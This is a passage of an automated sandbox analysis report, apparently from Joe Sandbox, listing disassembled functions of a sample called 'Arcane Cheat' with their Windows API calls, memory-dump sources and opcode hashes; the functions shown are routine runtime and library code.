                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystem
                                  • String ID:
                                  • API String ID: 1175261203-0
                                  • Opcode ID: d7c4e1e5f0ba83de630aa64964262def917ead45325b5d35b8e6991c5d167112
                                  • Instruction ID: ca173dee837f9a6b165e7f9c227f82c679b7eb4851c8d5dc2093ff283271014e
                                  • Opcode Fuzzy Hash: d7c4e1e5f0ba83de630aa64964262def917ead45325b5d35b8e6991c5d167112
                                  • Instruction Fuzzy Hash: C3E0127690162C6BDB219AA4AC45FD6776CFF093C2F0400A5BA48D3144DA749A948BE1
                                  Function 00839B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00839B30
                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00839B37
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: BitmapCreateFromGdipStream
                                  • String ID:
                                  • API String ID: 1918208029-0
                                  • Opcode ID: 242aa05f5ef38ccf0f0b1aeaf4770b533db4c3873e892f2472d16472d91b0875
                                  • Instruction ID: 8b151b448169f7e5a8c9608ad0644a7f7df1589c4d6e25e9690a7db221861dc3
                                  • Opcode Fuzzy Hash: 242aa05f5ef38ccf0f0b1aeaf4770b533db4c3873e892f2472d16472d91b0875
                                  • Instruction Fuzzy Hash: 22E0ED71901218EBDB50DF98D54179AB7E8FB44321F20805BF899D3240D6B16E449BD1
                                  Function 0084215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0084329A: try_get_function.LIBVCRUNTIME ref: 008432AF
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0084217A
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00842185
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                  • String ID:
                                  • API String ID: 806969131-0
                                  • Opcode ID: a5749b479b727158f48965fa212d8fdc4ca58c8cb0f17449c37d4181a8c3a8e6
                                  • Instruction ID: b6cd91e668f0aff169366f1c3b8e2936ed68a182c4ef3a86db3b8c92f73ba56a
                                  • Opcode Fuzzy Hash: a5749b479b727158f48965fa212d8fdc4ca58c8cb0f17449c37d4181a8c3a8e6
                                  • Instruction Fuzzy Hash: A5D0C92564C74E246D582AB82C565A93388FDA2BB93E00A86F630CA2D1EE59A145A112
                                  Function 0083DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • DloadLock.DELAYIMP ref: 0083DC73
                                  • DloadProtectSection.DELAYIMP ref: 0083DC8F
                                    • Part of subcall function 0083DE67: DloadObtainSection.DELAYIMP ref: 0083DE77
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Dload$Section$LockObtainProtect
                                  • String ID:
                                  • API String ID: 731663317-0
                                  • Opcode ID: a2c94da1a6e15ed94492a220da81006b18ca929febdc0768c9f8292c57dffa36
                                  • Instruction ID: f7f0108f4b5ca459fe74e02c7db75c80ad548a175dba13b544fb58a092326c40
                                  • Opcode Fuzzy Hash: a2c94da1a6e15ed94492a220da81006b18ca929febdc0768c9f8292c57dffa36
                                  • Instruction Fuzzy Hash: CED0C9701003008AC291AF28F98675C3271F784748FA41601E105C62A0DFB85485DB86
                                  Function 008212E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemShowWindow
                                  • String ID:
                                  • API String ID: 3351165006-0
                                  • Opcode ID: 62f325098378a886ee32ee1d23e84e057272c389cddd3983b2f5531750426c95
                                  • Instruction ID: 2f1248909b9a80233f770fb5dd0839203227dd8863e9a0cbff269d82411d763f
                                  • Opcode Fuzzy Hash: 62f325098378a886ee32ee1d23e84e057272c389cddd3983b2f5531750426c95
                                  • Instruction Fuzzy Hash: 2EC0123A058200BECB020BB4DC0DD2FBBE8BBA4212F25C908B2A5C0060D238E010DB11
                                  Function 008219A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: a53878c80e352317435af7a937ee2168f540a5ce5cfa6dd35bb1f35a42905a8a
                                  • Instruction ID: 9ba3ff3d670a01966cd8d6fbb1e0057ed6b6916f4ed658d902850fc93a06cd4e
                                  • Opcode Fuzzy Hash: a53878c80e352317435af7a937ee2168f540a5ce5cfa6dd35bb1f35a42905a8a
                                  • Instruction Fuzzy Hash: 81C1D734A042649FEF15CF68D48CBA97BA5FF25310F2840BADC46DF286CB359984CB61
                                  Function 00823B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: e9cc3f3b160c11f880956ab2c0b9b53b6427c35e1f59f6797aa4b7b3224920e4
                                  • Instruction ID: 7b790f4b1796798a732903feec17ee1f5c2484d01483373a910053dd0c99f783
                                  • Opcode Fuzzy Hash: e9cc3f3b160c11f880956ab2c0b9b53b6427c35e1f59f6797aa4b7b3224920e4
                                  • Instruction Fuzzy Hash: 3C71E071100B54AECB21DB34EC51AEBB7E8FF14301F44492EE5ABC7242DA366A88CF51
                                  Function 0082837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00828384
                                    • Part of subcall function 00821380: __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00821380: new.LIBCMT ref: 008213FE
                                    • Part of subcall function 008219A6: __EH_prolog.LIBCMT ref: 008219AB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 90d14e45ebdd1ab691b77efec16ec5035d8e7091e3805c93c5a8b0c321ab9bb6
                                  • Instruction ID: 1adbfd824295f15f23e308547db378de02a3fa8189556d152a5e4cbe3de40ab0
                                  • Opcode Fuzzy Hash: 90d14e45ebdd1ab691b77efec16ec5035d8e7091e3805c93c5a8b0c321ab9bb6
                                  • Instruction Fuzzy Hash: 0341AE718416789ADF20EB64E855BEAB3A8FF50300F0440EAE58AE3092DF745AC8DF55
                                  Function 00821E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821E05
                                    • Part of subcall function 00823B3D: __EH_prolog.LIBCMT ref: 00823B42
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 78a04e65914090dbe988f35a8e3604020360fc0b95c3b9e5412072435f85d53c
                                  • Instruction ID: 7436c1743fe7acaa91136527fda6de415a09269d3565dfeb481c53dbe9a2fa21
                                  • Opcode Fuzzy Hash: 78a04e65914090dbe988f35a8e3604020360fc0b95c3b9e5412072435f85d53c
                                  • Instruction Fuzzy Hash: 522139719041189FCF11EF98E9959EEBBF6FF68300F20006DE845A7251CB325E54CBA1
                                  Function 0083A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083A7C8
                                    • Part of subcall function 00821380: __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00821380: new.LIBCMT ref: 008213FE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 71c24171a2b242edce597719d6b99dd43eedcd96f11b0e8acca8529c26ac8c5c
                                  • Instruction ID: b27c4309123c4c78cb89a316c85444d5cdff3cb080a192b16b1dd061cd7ede4c
                                  • Opcode Fuzzy Hash: 71c24171a2b242edce597719d6b99dd43eedcd96f11b0e8acca8529c26ac8c5c
                                  • Instruction Fuzzy Hash: 35216D71C042599ACF14DF98D9425EEB7B4FF69304F1004AAE809E3242DB356E46CBA2
                                  Function 008292E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 1a62efbf7369d49bb1ff0b7e96fb0eb899b56a9f12dae03a0fd529391f26eb29
                                  • Instruction ID: 60cc20946246f7b884f2aa52a4b751a1e188cc185d21539b0ea7ad7bd31eaee0
                                  • Opcode Fuzzy Hash: 1a62efbf7369d49bb1ff0b7e96fb0eb899b56a9f12dae03a0fd529391f26eb29
                                  • Instruction Fuzzy Hash: 8E117C73E005389BCF22EAACEC459EEB736FF88750F004129F805E7251CA348D9486A1
                                  Function 0082AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction ID: 4b5a57753f6119afbc8565963b83b3b204aa55ddaec82ee4fe515ed4e5d8ae71
                                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction Fuzzy Hash: 0FF081705007359FDB38DA68E941626B7D4FF25320F20891AE497C2690E770D8C0C742
                                  Function 00825BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00825BDC
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: eabb232e70f0f0c56ce045582b38685a2d2f7b461b5f2f8f52d92f658db7eee6
                                  • Instruction ID: 25aebb9a35377c4fddf984e1ea5e6ed089938b3c55915cfad2f4ebf6a5be2188
                                  • Opcode Fuzzy Hash: eabb232e70f0f0c56ce045582b38685a2d2f7b461b5f2f8f52d92f658db7eee6
                                  • Instruction Fuzzy Hash: EF01A234901664DAC726F7A8D0153DDF7B4EF19300F8040ADA959932D3CBB01B08C653
                                  Function 00848518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6a3b7636837684f9bf7746f59478eda67673969b0e62eca389dcb42ce0d63fdb
                                  • Instruction ID: 67c77ccfb0e151f3731ae4729f391af725cd02e205138937c49a8c0f18fbdc7b
                                  • Opcode Fuzzy Hash: 6a3b7636837684f9bf7746f59478eda67673969b0e62eca389dcb42ce0d63fdb
                                  • Instruction Fuzzy Hash: CCE0ED31640A2DDAEB312B6D9C00B9EBB8CFB417F0F160220AC58E2084CF20CC0186E6
                                  Function 008296D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0082968F,?,?,?,?,00851FA1,000000FF), ref: 008296EB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 07ee0aa025d51d1f887c7aefc40404930911f02b8e4d261f0506a91674005d4f
                                  • Instruction ID: c0aa6ef094c7794ecbff56f928c85c09564fc0d8a4209031b88c3f4139bdec18
                                  • Opcode Fuzzy Hash: 07ee0aa025d51d1f887c7aefc40404930911f02b8e4d261f0506a91674005d4f
                                  • Instruction Fuzzy Hash: E6F05E30556B258FDB318A24E948792B7E4FB22725F048B1ED0EB834E0A765689D8F40
                                  Function 0082A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0082A4F5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: a46fb3de67989406a345f2d896bbf183bb241d1caf6bb1b767f99b2e905f30ba
                                  • Instruction ID: 028d311ce3549aee6220f5e18fd542e1a4cf3b0db75696f8ff2e0ddb100eb6ab
                                  • Opcode Fuzzy Hash: a46fb3de67989406a345f2d896bbf183bb241d1caf6bb1b767f99b2e905f30ba
                                  • Instruction Fuzzy Hash: ADF0B4310097A0ABCA266BBC59047D7BB90FF06371F04CA4AF1F9821D2C27454D59723
                                  Function 0083067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 008306B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ExecutionStateThread
                                  • String ID:
                                  • API String ID: 2211380416-0
                                  • Opcode ID: 370e803d0d8840ecaffcde52b55826cfa68a32cb464bed7a4fb21cc9f2966e8b
                                  • Instruction ID: ec26f84bc1eaafd78ae41d0a650709856580f4915065c2f99f1b5d05744b9475
                                  • Opcode Fuzzy Hash: 370e803d0d8840ecaffcde52b55826cfa68a32cb464bed7a4fb21cc9f2966e8b
                                  • Instruction Fuzzy Hash: EDD0C22520522066CA23336CA80A7FF1A0AFFC2B10F0A0021B04DD32D69E8A08864AE3
                                  Function 00839D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GdipAlloc.GDIPLUS(00000010), ref: 00839D81
                                    • Part of subcall function 00839B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00839B30
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
